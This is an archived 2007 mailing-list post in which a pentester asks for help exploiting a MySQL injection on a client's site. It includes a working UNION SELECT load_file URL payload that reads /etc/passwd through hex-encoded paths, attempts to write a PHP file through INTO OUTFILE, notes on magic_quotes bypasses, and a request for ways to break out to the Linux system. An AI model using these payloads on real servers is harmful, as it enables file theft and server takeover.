From: Danett song (danett18@yahoo.com.br)
Date: Sat Jul 21 2007 - 21:28:12 EDT
Hello
I'm pentesting a customer in a blackbox method, I
found a Mysql Injection based in error response.
I'm able to explore it using a query like this one:
http://site/files/index.php?url=search.php&id=251%20UNION%20SELECT%20load_file(0x2F6574632F706173737764),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/*&coditem=251
It worked ok, so I could extract the contents of
passwd file.
The server is with magic quotes on, so i needed to hex
enquote the filenames. The php files are connected as
user mysql.
I made some tests without sucess:
a) Via another flaw I could disclosure the
DocumentRoot, which is /web/site, If I try to read the
index.php file, using the same injection, but only
replacing the /etc/passwd with
/web/site/files/index.php (obvious hex encoding it) I
got no reply! It doesn't return any content of the
index.php! It also work for /etc/hosts. Why it isn't
working? Strange ahn? The default umask allow every
users to read new created files, I think is very
uncommon a developer which remove the read permissions
of all .php file he upload. Do you mean that is the
case? Or I'm missing something?
b) My goal is be able to gain acess to the linux
running, the server have only the port 80 opened. My
best try was to create a .php file inside the
DocumentRoot and try to acess it via browser, but this
file never got created. I'm not sure if cause it
doesn't have permissions, or problems related with
quotes!
I tryed using the method in question a) but replacing
the union for:
Select <?phpinfo.php>? into outfile
'/http/arquivos/phpinfo.php'
I tryed encoding both the php code as the filename
with hex. I also tryed replace the quote (') in the
name by (%). But nothing worked.
The OWASP testing guide say that if my server have
magic_quotes on which is my case, it's not possible.
http://www.owasp.org/index.php/Testing_for_MySQL
However, NGSsoftware disagree:
http://www.ngssoftware.com/papers/HackproofingMySQL.pdf
I also tryed to use char() encoding and the GBK
0xbf27 (never had tryed it before, but appear not work
in this case).
Any idea how to complain this attack?
c) Cause I'm using a bunch of NULL to validade the
union statment, I can't do (at last i don't know how
to do) complex select, which require use the comma
(,), else it will break my union statment. How to deal
when my injected query have MORE comma's than the
comma's used in NULL to validade the select?
d) Any idea how to break from mysql to the linux
system?
Cheers
Flickr agora em português. Você cria, todo mundo vê.
http://www.flickr.com.br/
------------------------------------------------------------------------
This list is sponsored by: Cenzic
Need to secure your web apps NOW?
Cenzic finds more, "real" vulnerabilities fast.
Click to try it, buy it or download a solution FREE today!
http://www.cenzic.com/downloads
------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:57 EDT